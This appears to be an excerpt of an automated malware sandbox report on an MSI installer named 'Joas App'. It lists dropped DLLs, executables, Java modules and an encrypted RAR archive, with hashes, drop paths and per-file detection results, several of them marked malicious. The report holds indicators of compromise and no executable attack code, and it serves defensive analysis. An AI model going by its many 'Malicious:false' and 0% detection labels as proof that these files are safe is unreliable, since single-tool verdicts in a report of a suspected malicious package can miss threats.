                                                          SHA1:7F17FBDCEF12042D215828C1D6675E483A4C62B1
                                                          SHA-256:1C72AC404781A9986D8EDEB0EE5DD39D2C27CE505683CA3324C0ECCD6193610A
                                                          SHA-512:6076086082E3E824309BA2C178E95570A34ECE6F2339BE500B8B0A51F0F316B39A4C8D70898C4D50F89F3F43D65C5EBBEC3094A47D91677399802F327287D43B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12744
                                                          Entropy (8bit):6.599515320379107
                                                          Encrypted:false
                                                          SSDEEP:192:fKIMFFyWYhW6WWFYg7VWQ4eWoVjxceXqnajLJ4:fcyWYhWKRjmAlnJ4
                                                          MD5:9D43B5E3C7C529425EDF1183511C29E4
                                                          SHA1:07CE4B878C25B2D9D1C48C462F1623AE3821FCEF
                                                          SHA-256:19C78EF5BA470C5B295DDDEE9244CBD07D0368C5743B02A16D375BFB494D3328
                                                          SHA-512:C8A1C581C3E465EFBC3FF06F4636A749B99358CA899E362EA04B3706EAD021C69AE9EA0EFC1115EAE6BBD9CF6723E22518E9BEC21F27DDAAFA3CF18B3A0034A7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.690164913578267
                                                          Encrypted:false
                                                          SSDEEP:192:4EWYhWdWWFYg7VWQ4eWvvJ6jxceXqnajLJn:4EWYhWbwYjmAlnJ
                                                          MD5:43E1AE2E432EB99AA4427BB68F8826BB
                                                          SHA1:EEE1747B3ADE5A9B985467512215CAF7E0D4CB9B
                                                          SHA-256:3D798B9C345A507E142E8DACD7FB6C17528CC1453ABFEF2FFA9710D2FA9E032C
                                                          SHA-512:40EC0482F668BDE71AEB4520A0709D3E84F093062BFBD05285E2CC09B19B7492CB96CDD6056281C213AB0560F87BD485EE4D2AEEFA0B285D2D005634C1F3AF0B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.615761482304143
                                                          Encrypted:false
                                                          SSDEEP:192:dZ89WYhWFWWFYg7VWQ4eW5QLyFqnajziMOci:dZ89WYhWDnolniMOP
                                                          MD5:735636096B86B761DA49EF26A1C7F779
                                                          SHA1:E51FFBDDBF63DDE1B216DCCC753AD810E91ABC58
                                                          SHA-256:5EB724C51EECBA9AC7B8A53861A1D029BF2E6C62251D00F61AC7E2A5F813AAA3
                                                          SHA-512:3D5110F0E5244A58F426FBB72E17444D571141515611E65330ECFEABDCC57AD3A89A1A8B2DC573DA6192212FB65C478D335A86678A883A1A1B68FF88ED624659
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12744
                                                          Entropy (8bit):6.627282858694643
                                                          Encrypted:false
                                                          SSDEEP:192:R0WYhWRWWFYg7VWQ4eWLeNxUUtpwBqnajrmaaG:R0WYhWPzjqlQG
                                                          MD5:031DC390780AC08F498E82A5604EF1EB
                                                          SHA1:CF23D59674286D3DC7A3B10CD8689490F583F15F
                                                          SHA-256:B119ADAD588EBCA7F9C88628010D47D68BF6E7DC6050B7E4B787559F131F5EDE
                                                          SHA-512:1468AD9E313E184B5C88FFD79A17C7D458D5603722620B500DBA06E5B831037CD1DD198C8CE2721C3260AB376582F5791958763910E77AA718449B6622D023C7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15816
                                                          Entropy (8bit):6.435326465651674
                                                          Encrypted:false
                                                          SSDEEP:192:JM0wd8dc9cydWYhWyWWFYg7VWQ4eW9jTXfH098uXqnajH/VCf:G0wd8xydWYhWi2bXuXlTV2
                                                          MD5:285DCD72D73559678CFD3ED39F81DDAD
                                                          SHA1:DF22928E43EA6A9A41C1B2B5BFCAB5BA58D2A83A
                                                          SHA-256:6C008BE766C44BF968C9E91CDDC5B472110BEFFEE3106A99532E68C605C78D44
                                                          SHA-512:84EF0A843798FD6BD6246E1D40924BE42550D3EF239DAB6DB4D423B142FA8F691C6F0603687901F1C52898554BF4F48D18D3AEBD47DE935560CDE4906798C39A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.5874576656353145
                                                          Encrypted:false
                                                          SSDEEP:192:6KNMWYhW6WWFYg7VWQ4eWSA5lJSdqnajeMh3:6KNMWYhWKiKdlaW
                                                          MD5:5CCE7A5ED4C2EBAF9243B324F6618C0E
                                                          SHA1:FDB5954EE91583A5A4CBB0054FB8B3BF6235EED3
                                                          SHA-256:AA3E3E99964D7F9B89F288DBE30FF18CBC960EE5ADD533EC1B8326FE63787AA3
                                                          SHA-512:FC85A3BE23621145B8DC067290BD66416B6B1566001A799975BF99F0F526935E41A2C8861625E7CFB8539CA0621ED9F46343C04B6C41DB812F58412BE9C8A0DE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13768
                                                          Entropy (8bit):6.645869978118917
                                                          Encrypted:false
                                                          SSDEEP:192:CGnWlC0i5ClWYhWwWWFYg7VWQ4eWtOUtpwBqnajrmaaGN4P:9nWm5ClWYhWQ8qlQGN6
                                                          MD5:41FBBB054AF69F0141E8FC7480D7F122
                                                          SHA1:3613A572B462845D6478A92A94769885DA0843AF
                                                          SHA-256:974AF1F1A38C02869073B4E7EC4B2A47A6CE8339FA62C549DA6B20668DE6798C
                                                          SHA-512:97FB0A19227887D55905C2D622FBF5451921567F145BE7855F72909EB3027F48A57D8C4D76E98305121B1B0CC1F5F2667EF6109C59A83EA1B3E266934B2EB33C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):37333152
                                                          Entropy (8bit):6.632921864082428
                                                          Encrypted:false
                                                          SSDEEP:393216:LzyCmQCOCLheXbl4MEf+Eidgrpj3xO6FLzq2KHplhrX5:L5WLheXbl4MEf+HgrpjVF6PD5
                                                          MD5:32F56F3E644C4AC8C258022C93E62765
                                                          SHA1:06DFF5904EBBF69551DFA9F92E6CC2FFA9679BA1
                                                          SHA-256:85AF2FB4836145098423E08218AC381110A6519CB559FF6FC7648BA310704315
                                                          SHA-512:CAE2B9E40FF71DDAF76A346C20028867439B5726A16AE1AD5E38E804253DFCF6ED0741095A619D0999728D953F2C375329E86B8DE4A0FCE55A8CDC13946D5AD8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5100112
                                                          Entropy (8bit):6.374242928276845
                                                          Encrypted:false
                                                          SSDEEP:49152:WBUp8DPNkkup6GAx9HEekwEfG/66xcPiw+UgAnBM+sVf9d3PWKOyz/Omlc69kXOV:WB/Z16w8idUgfT0b6LnBSpytGyodUl
                                                          MD5:01589E66D46ABCD9ACB739DA4B542CE4
                                                          SHA1:6BF1BD142DF68FA39EF26E2CAE82450FED03ECB6
                                                          SHA-256:9BB4A5F453DA85ACD26C35969C049592A71A7EF3060BFA4EB698361F2EDB37A3
                                                          SHA-512:0527AF5C1E7A5017E223B3CC0343ED5D42EC236D53ECA30D6DECCEB2945AF0C1FBF8C7CE367E87BC10FCD54A77F5801A0D4112F783C3B7E829B2F40897AF8379
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1089600
                                                          Entropy (8bit):6.535744457220272
                                                          Encrypted:false
                                                          SSDEEP:24576:NFUq9wHzADwiB0Bm3k6gz0sA+wLDZyoFNRsKYw:TUdMDwIgm3kpzsNpyoFDsKYw
                                                          MD5:3AAF57892F2D66F4A4F0575C6194F0F8
                                                          SHA1:D65C9143603940EDE756D7363AB6750F6B45AB4E
                                                          SHA-256:9E0D0A05B798DA5D6C38D858CE1AD855C6D68BA2F9822FA3DA16E148E97F9926
                                                          SHA-512:A5F595D9C48B8D5191149D59896694C6DD0E9E1AF782366162D7E3C90C75B2914F6E7AFF384F4B59CA7C5A1ECCCDBF5758E90A6A2B14A8625858A599DCCA429B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):57488
                                                          Entropy (8bit):6.382541157520703
                                                          Encrypted:false
                                                          SSDEEP:768:eQ6XULhGj8TzwsoeZwVAsuEIBh8v6H3eQdFyN+yghK3m5rR8vSoQuSd:ECVbTGkiE/c+XA3g2L7S
                                                          MD5:71F796B486C7FAF25B9B16233A7CE0CD
                                                          SHA1:21FFC41E62CD5F2EFCC94BAF71BD2659B76D28D3
                                                          SHA-256:B2ACB555E6D5C6933A53E74581FD68D523A60BCD6BD53E4A12D9401579284FFD
                                                          SHA-512:A82EA6FC7E7096C10763F2D821081F1B1AFFA391684B8B47B5071640C8A4772F555B953445664C89A7DFDB528C5D91A9ADDB5D73F4F5E7509C6D58697ED68432
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:RAR archive data, v5
                                                          Category:dropped
                                                          Size (bytes):424910
                                                          Entropy (8bit):7.999568605221469
                                                          Encrypted:true
                                                          SSDEEP:6144:bGg8t2FsdvHWyFx0nOtEIUS2YrXJyEXY+Y223Rb4ETaGaKvzLUjYScApA:jV2VxFtdrXfXY+Y22WETa3KvnYXcAq
                                                          MD5:07B1777CB885122FFB9A6300C58D660B
                                                          SHA1:A85B0F8F155906DC1DE4381CC9D22F28A6BEAC6D
                                                          SHA-256:7BC4F8C4111DC16005DBCA3FE3A352AE09C6DE34C5ACC689109CB45D9E4CA653
                                                          SHA-512:3376D929DA5CC4DEF6A86346DBBA0B67DCC853BA5C064E3A56D490909DB913C7E5F1C2775E64751F942FAC4681802E8990E3767919D2C6843044066E0FCFB98D
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):566704
                                                          Entropy (8bit):6.494428734965787
                                                          Encrypted:false
                                                          SSDEEP:12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
                                                          MD5:6DA7F4530EDB350CF9D967D969CCECF8
                                                          SHA1:3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
                                                          SHA-256:9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
                                                          SHA-512:1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):35656
                                                          Entropy (8bit):6.370522595411868
                                                          Encrypted:false
                                                          SSDEEP:768:ixmeWkfdHAWcgj7Y7rEabyLcRwEpYinAMx1nyqaJ:pXUdg8jU7r4LcRZ7Hx1nyqa
                                                          MD5:D3CAC4D7B35BACAE314F48C374452D71
                                                          SHA1:95D2980786BC36FEC50733B9843FDE9EAB081918
                                                          SHA-256:4233600651FB45B9E50D2EC8B98B9A76F268893B789A425B4159675B74F802AA
                                                          SHA-512:21C8D73CC001EF566C1F3C7924324E553A6DCA68764ECB11C115846CA54E74BD1DFED12A65AF28D9B00DDABA04F987088AA30E91B96E050E4FC1A256FFF20880
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1471488
                                                          Entropy (8bit):6.531060177613409
                                                          Encrypted:false
                                                          SSDEEP:12288:UZ0/8PSUgSokxJoArHkF6JidEn+95uTfO7ATuze7IbOjtPPb:4O8PSUgS/xKeEFYw+QAaS7ISjR
                                                          MD5:E61C28A8F899A43145083F0DE80E099C
                                                          SHA1:D976FA364385FDAF4CB38D2F9E2003E93983A521
                                                          SHA-256:ED2589F02D22A35500A93D970D872CCF1D83EC4446F591B4E6B8F4D46EBCDF22
                                                          SHA-512:F5B6086B395DA196761D6EF8501725905C40DADD11F8096970EA3B9750F00961A36215C88F5C19E96C47BA719C0395A5BF6B1D92D56702473CA978EF6F07D596
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):158968
                                                          Entropy (8bit):6.4238235663554955
                                                          Encrypted:false
                                                          SSDEEP:1536:izN/1rbQ+rTccg/Lla75jjVBzYCDNzuDQr5whduOd7EKPuh9Aco6uAGUtQFUzcnX:8N/FQ+rejlaFhdrXORhjD6VGUtQWk
                                                          MD5:7FB892E2AC9FF6981B6411FF1F932556
                                                          SHA1:861B6A1E59D4CD0816F4FEC6FD4E31FDE8536C81
                                                          SHA-256:A45A29AECB118FC1A27ECA103EAD50EDD5343F85365D1E27211FE3903643C623
                                                          SHA-512:986672FBB14F3D61FFF0924801AAB3E9D6854BB3141B95EE708BF5B80F8552D5E0D57182226BABA0AE8995A6A6F613864AB0E5F26C4DCE4EB88AB82B060BDAC5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):707200
                                                          Entropy (8bit):6.610520126248797
                                                          Encrypted:false
                                                          SSDEEP:12288:hTl8xt5jEuhuoWZz8Rt5brZcXVEZMbYwepVQ0G6ddTD8qevJMLf50555555555mj:hZ8xt5jEuhuoWZz8Rt5brZcXVEZMbYJz
                                                          MD5:1144E36E0F8F739DB55A7CF9D4E21E1B
                                                          SHA1:9FA49645C0E3BAE0EDD44726138D7C72EECE06DD
                                                          SHA-256:65F8E4D76067C11F183C0E1670972D81E878E6208E501475DE514BC4ED8638FD
                                                          SHA-512:A82290D95247A67C4D06E5B120415318A0524D00B9149DDDD8B32E21BBD0EE4D86BB397778C4F137BF60DDD4167EE2E9C6490B3018031053E9FE3C0D0B3250E7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12124160
                                                          Entropy (8bit):4.1175508751036585
                                                          Encrypted:false
                                                          SSDEEP:49152:opbNLHjtBKapOZoWPQ8MQvfyf3t+WpskQS+ZSZmpPwoe5GOSwleJiXACPQDk8p8j:o9NDU1eB1
                                                          MD5:8A13CBE402E0BBF3DA56315F0EBA7F8E
                                                          SHA1:EE8B33FA87D7FA04B9B7766BCF2E2C39C4F641EA
                                                          SHA-256:7B5E6A18A805D030779757B5B9C62721200AD899710FF930FC1C72259383278C
                                                          SHA-512:46B804321AB1642427572DD141761E559924AF5D015F3F1DD97795FB74B6795408DEAD5EA822D2EB8FBD88E747ECCAD9C3EE8F9884DFDB73E87FAD7B541391DA
                                                          Malicious:false
                                                          Preview:... Java HotSpot(TM) 64-Bit Server VM (15.0.1+9-18) for windows-amd64 JRE (15.0.1+9-18), built on Sep 15 2020 14:43:54 by "mach5one" with unknown MS VC++:1925 ...
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):51389
                                                          Entropy (8bit):7.916683616123071
                                                          Encrypted:false
                                                          SSDEEP:768:GO5DN7hkJDEnwQm0aCDOdC4Lk1eo8eNEyu/73vVjPx5S+3TYWFwSvZt6xdWDvw:GO5h7hkREnyvo8QBuDNjfvD1/3vw
                                                          MD5:8F4C0388762CD566EAE3261FF8E55D14
                                                          SHA1:B6C5AA0BBFDDE8058ABFD06637F7BEE055C79F4C
                                                          SHA-256:AAEFACDD81ADEEC7DBF9C627663306EF6B8CDCDF8B66E0F46590CAA95CE09650
                                                          SHA-512:1EF4D8A9D5457AF99171B0D70A330B702E275DCC842504579E24FC98CC0B276F8F3432782E212589FC52AA93BBBC00A236FE927BE0D832DD083E8F5EBDEB67C2
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):41127
                                                          Entropy (8bit):7.961466748192397
                                                          Encrypted:false
                                                          SSDEEP:768:L0xH2Z5C7/c8GqFsHWShYYptTpmPSB4gTQSq4Yz1jHoAsbjX:wxH66/crqiH3tTVTsSVYz1jIAsfX
                                                          MD5:D039093C051B1D555C8F9B245B3D7FA0
                                                          SHA1:C81B0DAEDAB28354DEA0634B9AE9E10EE72C4313
                                                          SHA-256:4A495FC5D119724F7D40699BB5D2B298B0B87199D09129AEC88BBBDBC279A68D
                                                          SHA-512:334FD85ACE22C90F8D4F82886EEF1E6583184369A031DCEE6E0B6624291F231D406A2CEC86397C1B94D535B36A5CF7CB632BB9149B8518B794CBFA1D18A2478F
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):113725
                                                          Entropy (8bit):7.928841651831531
                                                          Encrypted:false
                                                          SSDEEP:3072:6jB5A+VPT8IdtpHAUfEzhLpIrxbt2rlnH6:6ZRTPHgU2pItshH6
                                                          MD5:3A03EF8F05A2D0472AE865D9457DAB32
                                                          SHA1:7204170A08115A16A50D5A06C3DE7B0ADB6113B1
                                                          SHA-256:584D15427F5B0AC0CE4BE4CAA2B3FC25030A0CF292F890C6D3F35836BC97FA6D
                                                          SHA-512:1702C6231DAAB27700160B271C3D6171387F89DA0A97A3725B4B9D404C94713CB09BA175DE8E78A8F0CBD8DD0DD73836A38C59CE8D1BD38B4F57771CF9536E77
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):896846
                                                          Entropy (8bit):7.923431656723031
                                                          Encrypted:false
                                                          SSDEEP:12288:3xz+ej0yUGnip25kAyyrAm0G4hcpbLIWFWb4YNlgWUz4u5cnLXlAVz/Q+9Ec8zCU:3cZpcryy8mp4hpSxWUQuV//yDXX
                                                          MD5:C6FBB7D49CAA027010C2A817D80CA77C
                                                          SHA1:4191E275E1154271ABF1E54E85A4FF94F59E7223
                                                          SHA-256:1C8D9EFAEB087AA474AD8416C3C2E0E415B311D43BCCA3B67CBF729065065F09
                                                          SHA-512:FDDC31FA97AF16470EA2F93E3EF206FFB217E4ED8A5C379D69C512652987E345CB977DB84EDA233B190181C6E6E65C173062A93DB3E6BB9EE7E71472C9BBFE34
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):639224
                                                          Entropy (8bit):6.219852228773659
                                                          Encrypted:false
                                                          SSDEEP:12288:FgLcjQQPKZZK8aF4yBj3Fnx4DMDO8jalo:FggjQKuyDnxvOYaC
                                                          MD5:01DACEA3CBE5F2557D0816FC64FAE363
                                                          SHA1:566064A9CB1E33DB10681189A45B105CDD504FD4
                                                          SHA-256:B4C96B1E5EEE34871D9AB43BCEE8096089742032C0669DF3C9234941AAC3D502
                                                          SHA-512:C22BFE54894C26C0BD8A99848B33E1B9A9859B3C0C893CB6039F9486562C98AA4CEAB0D28C98C1038BD62160E03961A255B6F8627A7B2BB51B86CC7D6CBA9151
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):98224
                                                          Entropy (8bit):6.452201564717313
                                                          Encrypted:false
                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):37256
                                                          Entropy (8bit):6.297533243519742
                                                          Encrypted:false
                                                          SSDEEP:384:5hnvMCmWEKhUcSLt5a9k6KrOE5fY/ntz5txWE6Wc+Xf0+uncS7IO5WrCKWU/tQ0g:YCm5KhUcwrHY/ntTxT6ov07b4SwY1zl
                                                          MD5:135359D350F72AD4BF716B764D39E749
                                                          SHA1:2E59D9BBCCE356F0FECE56C9C4917A5CACEC63D7
                                                          SHA-256:34048ABAA070ECC13B318CEA31425F4CA3EDD133D350318AC65259E6058C8B32
                                                          SHA-512:CF23513D63AB2192C78CAE98BD3FEA67D933212B630BE111FA7E03BE3E92AF38E247EB2D3804437FD0FDA70FDC87916CD24CF1D3911E9F3BFB2CC4AB72B459BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53576
                                                          Entropy (8bit):6.371750593889357
                                                          Encrypted:false
                                                          SSDEEP:1536:ij2SSS5nVoSiH/pOfv3Q3cY37Hx1nI6q:GhSSntiH/pOfvAf3
                                                          MD5:E1EEBD44F9F4B52229D6E54155876056
                                                          SHA1:052CEA514FC3DA5A23DE6541F97CD4D5E9009E58
                                                          SHA-256:D96F2242444A334319B4286403D4BFADAF3F9FCCF390F3DD40BE32FB48CA512A
                                                          SHA-512:235BB9516409A55FE7DDB49B4F3179BDCA406D62FD0EC1345ACDDF032B0F3F111C43FF957D4D09AD683D39449C0FFC4C050B387507FADF5384940BD973DAB159
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):144200
                                                          Entropy (8bit):6.592048391646652
                                                          Encrypted:false
                                                          SSDEEP:1536:GjxOs8gLeu4iSssNiTh9Yks32X3KqVy5SmBolzXfqLROJA0o1ZXMvr7Rn6dheIOI:I34iDsG5vm4bfqFKoDmr7h2MHTtwV6K
                                                          MD5:3A0DBC5701D20AA87BE5680111A47662
                                                          SHA1:BC581374CA1EBE8565DB182AC75FB37413220F03
                                                          SHA-256:D53BC4348AD6355C20F75ED16A2F4F641D24881956A7AE8A0B739C0B50CF8091
                                                          SHA-512:4740945606636C110AB6C365BD1BE6377A2A9AC224DE6A79AA506183472A9AD0641ECC63E5C5219EE8097ADEF6533AB35E2594D6F8A91788347FDA93CDB0440E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:MS Windows icon resource - 5 icons, 96x96, 32 bits/pixel, 72x72, 32 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):74814
                                                          Entropy (8bit):4.222546221932802
                                                          Encrypted:false
                                                          SSDEEP:384:ZjEycsRokXVkGKlrBRRRR/ur/f4C2+27g6Do:ZNcs/VkhlYf4CffG
                                                          MD5:32BC544E3EB5F62017DDB0E8E22F3048
                                                          SHA1:4CAB98A7CABD3C9D6FC99AD1E4663BC06C7D73CF
                                                          SHA-256:FAF4A3D5669725D2059158A4039BB03E0A599685C61794687E14D21F3F271132
                                                          SHA-512:294AACF59822FE78C0E6D3178988E313A3E42BE997162C77581E9BE334F926881F10A955AA337549CE5889DFA51AB188767521C3B23AD27276EDC1F97FD7D8D1
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Category:dropped
                                                          Size (bytes):59426257
                                                          Entropy (8bit):7.223374477574857
                                                          Encrypted:false
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          MD5:32AF5CFAB7BB87BEEDB521DE43837347
                                                          SHA1:2F128DB2405DD0362CE55629816DC8BBE83C0478
                                                          SHA-256:B582B290012AF285192FFDECC87A30F3964DACB82E26025C558AA0F46F2AB6FE
                                                          SHA-512:CA18C6552DB2D1D1502C75D41D69DD91A4F76A42C9E6C0D912871B65F085CCAF772CEBC0555D658E4DA4CAA48DEEF0B14A8E4D812C2461FD18661CEA410BE7E3
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Category:dropped
                                                          Size (bytes):59426257
                                                          Entropy (8bit):7.223374477574857
                                                          Encrypted:false
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          MD5:32AF5CFAB7BB87BEEDB521DE43837347
                                                          SHA1:2F128DB2405DD0362CE55629816DC8BBE83C0478
                                                          SHA-256:B582B290012AF285192FFDECC87A30F3964DACB82E26025C558AA0F46F2AB6FE
                                                          SHA-512:CA18C6552DB2D1D1502C75D41D69DD91A4F76A42C9E6C0D912871B65F085CCAF772CEBC0555D658E4DA4CAA48DEEF0B14A8E4D812C2461FD18661CEA410BE7E3
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):93975
                                                          Entropy (8bit):4.975289352407628
                                                          Encrypted:false
                                                          SSDEEP:384:ssyUZQBW9WTXEx7jEycsRokXVkGKlrBRRRR/ur/f4C2+27g6DoO2sN:ssy0QQ9WTXEZNcs/VkhlYf4CffGOK
                                                          MD5:D50DAD053D41C8ADE102D29439B9562A
                                                          SHA1:3BE78D2B62A13211E509836E0F31E5D3C4D30DBA
                                                          SHA-256:1969BD19A463D47D0D869E2804BF73DDCA255AA54D900D0F123B3846F95D84E4
